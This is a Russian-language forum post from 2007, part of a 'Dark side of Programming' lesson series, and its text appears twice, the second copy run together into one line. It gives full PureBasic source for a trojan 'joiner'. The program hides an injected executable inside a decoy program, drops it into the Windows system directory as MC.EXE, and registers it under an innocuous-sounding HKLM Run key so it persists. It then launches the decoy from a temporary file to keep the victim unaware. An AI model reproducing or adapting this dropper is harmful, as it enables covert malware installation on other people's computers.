forum.boolean.name - Показать сообщение отдельно

10.01.2007, 19:36

Alternative Joiner (дополнение к 3ему уроку):
У описанного в 3м уроке Joiner'а есть одна интересная особенность: он запускает оригинальную программу (ну, под которую он маскируется) непосредственно из памяти. Это, конечно, хорошо и правильно, но не всегда. Как я уже писала, с прогам под DOS (и некоторыми, спецефическими, под Windows) такой фокус не пройдет (или просто не будут работать, или будут, но так, что лучше бы не работали). Есть еще один ньюанс: при таком способе запуска не передаются параметры командной строки. Рассмотрим альтернативный вариант Joiner'а, лишенный этих недостатков (но имеющий свои

) :

DataSection
DNA: IncludeBinary "путь до иньектируемого EXE"
End_DNA:
EXE: IncludeBinary "путь до программы, под которую будет маскироваться Joiner" 
End_EXE:
EndDataSection

Procedure RegSetKey(hKey, SubKey.S, ValueName.S, Dat.S)
Define Hnd
RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @Hnd, 0)
RegSetValueEx_(Hnd, @ValueName, 0, #REG_SZ, @Dat, Len(Dat))
RegCloseKey_(Hnd)
EndProcedure

Define SysDir.S = Space(#MAX_PATH)
GetSystemDirectory_(SysDir, #MAX_PATH)
SysDir = PeekS(@SysDir)
If Right(SysDir, 1) <> "\" : SysDir + "\" : EndIf
SysDir + "MC.EXE"
SetFileAttributes(SysDir, #PB_FileSystem_Normal)
CreateFile(0, SysDir)
WriteData(0, ?DNA, ?End_DNA - ?DNA)
CloseFile(0)
RegSetKey(#HKEY_LOCAL_MACHINE, "SOFTWARE\MicroSoft\Windows\CurrentVersion\Run", "Mouse_Controller", SysDir)

Macro PReturn : ProcedureReturn : EndMacro

Procedure.S CombinePath(Dir.S, FName.S)
If Right(Dir, 1) <> "\" : Dir + "\" : EndIf
PReturn Dir + FName
EndProcedure

Procedure.S TempFile(Dir.S, Ext.S)
Define FName.S, TOFix
Repeat : FName = ""
TOFix = Random(39)
For I = 0 To TOFix
FName + Chr(Random(25) + 65)
Next I 
FName = CombinePath(Dir, FName + "." + Ext)
Until FileSize(FName) = -1 
PReturn FName
EndProcedure

Procedure.S CmdLine()
CL.S = PeekS(GetCommandLine_())
CutSize = Len(ProgramFilename())
If Left(CL, 1) = Chr('"') : CutSize + 2 : EndIf
CL = Trim(Right(CL, Len(CL) - CutSize))
PReturn CL
EndProcedure

Define CurDir.S = GetPathPart(ProgramFilename()), FNAme.S = TempFile(CurDir, ".EXE")
CreateFile(0, FName)
WriteData(0, ?EXE, ?End_EXE - ?EXE)
CloseFile(0)
RunProgram(FName, CmdLine(), CurDir, #PB_Program_Wait)
SetFileAttributes(FName, #PB_FileSystem_Normal)
DeleteFile(FName)

Настройка аналагоичная. В отличае от предыдущего Joiner'а, этот использует метод распаковки программы во временный файл (со случайным именем), и запуск уже оттуда (после окончания работы программы файл уничтожается). Этим методом можно запускать не работающие с первым Joiner'ом программы. Впрочем, есть проги, которые как раз не заработают под этим Joiner'ом. Думайте сами, решайте сами

...

10.01.2007, 19:36	#5
Chrono Syndrome Сообщений: n/a	Re: Dark side of Programming Alternative Joiner (дополнение к 3ему уроку): У описанного в 3м уроке Joiner'а есть одна интересная особенность: он запускает оригинальную программу (ну, под которую он маскируется) непосредственно из памяти. Это, конечно, хорошо и правильно, но не всегда. Как я уже писала, с прогам под DOS (и некоторыми, спецефическими, под Windows) такой фокус не пройдет (или просто не будут работать, или будут, но так, что лучше бы не работали). Есть еще один ньюанс: при таком способе запуска не передаются параметры командной строки. Рассмотрим альтернативный вариант Joiner'а, лишенный этих недостатков (но имеющий свои ) : DataSection DNA: IncludeBinary "путь до иньектируемого EXE" End_DNA: EXE: IncludeBinary "путь до программы, под которую будет маскироваться Joiner" End_EXE: EndDataSection Procedure RegSetKey(hKey, SubKey.S, ValueName.S, Dat.S) Define Hnd RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @Hnd, 0) RegSetValueEx_(Hnd, @ValueName, 0, #REG_SZ, @Dat, Len(Dat)) RegCloseKey_(Hnd) EndProcedure Define SysDir.S = Space(#MAX_PATH) GetSystemDirectory_(SysDir, #MAX_PATH) SysDir = PeekS(@SysDir) If Right(SysDir, 1) <> "\" : SysDir + "\" : EndIf SysDir + "MC.EXE" SetFileAttributes(SysDir, #PB_FileSystem_Normal) CreateFile(0, SysDir) WriteData(0, ?DNA, ?End_DNA - ?DNA) CloseFile(0) RegSetKey(#HKEY_LOCAL_MACHINE, "SOFTWARE\MicroSoft\Windows\CurrentVersion\Run", "Mouse_Controller", SysDir) Macro PReturn : ProcedureReturn : EndMacro Procedure.S CombinePath(Dir.S, FName.S) If Right(Dir, 1) <> "\" : Dir + "\" : EndIf PReturn Dir + FName EndProcedure Procedure.S TempFile(Dir.S, Ext.S) Define FName.S, TOFix Repeat : FName = "" TOFix = Random(39) For I = 0 To TOFix FName + Chr(Random(25) + 65) Next I FName = CombinePath(Dir, FName + "." + Ext) Until FileSize(FName) = -1 PReturn FName EndProcedure Procedure.S CmdLine() CL.S = PeekS(GetCommandLine_()) CutSize = Len(ProgramFilename()) If Left(CL, 1) = Chr('"') : CutSize + 2 : EndIf CL = Trim(Right(CL, Len(CL) - CutSize)) PReturn CL EndProcedure Define CurDir.S = GetPathPart(ProgramFilename()), FNAme.S = TempFile(CurDir, ".EXE") CreateFile(0, FName) WriteData(0, ?EXE, ?End_EXE - ?EXE) CloseFile(0) RunProgram(FName, CmdLine(), CurDir, #PB_Program_Wait) SetFileAttributes(FName, #PB_FileSystem_Normal) DeleteFile(FName) Настройка аналагоичная. В отличае от предыдущего Joiner'а, этот использует метод распаковки программы во временный файл (со случайным именем), и запуск уже оттуда (после окончания работы программы файл уничтожается). Этим методом можно запускать не работающие с первым Joiner'ом программы. Впрочем, есть проги, которые как раз не заработают под этим Joiner'ом. Думайте сами, решайте сами ...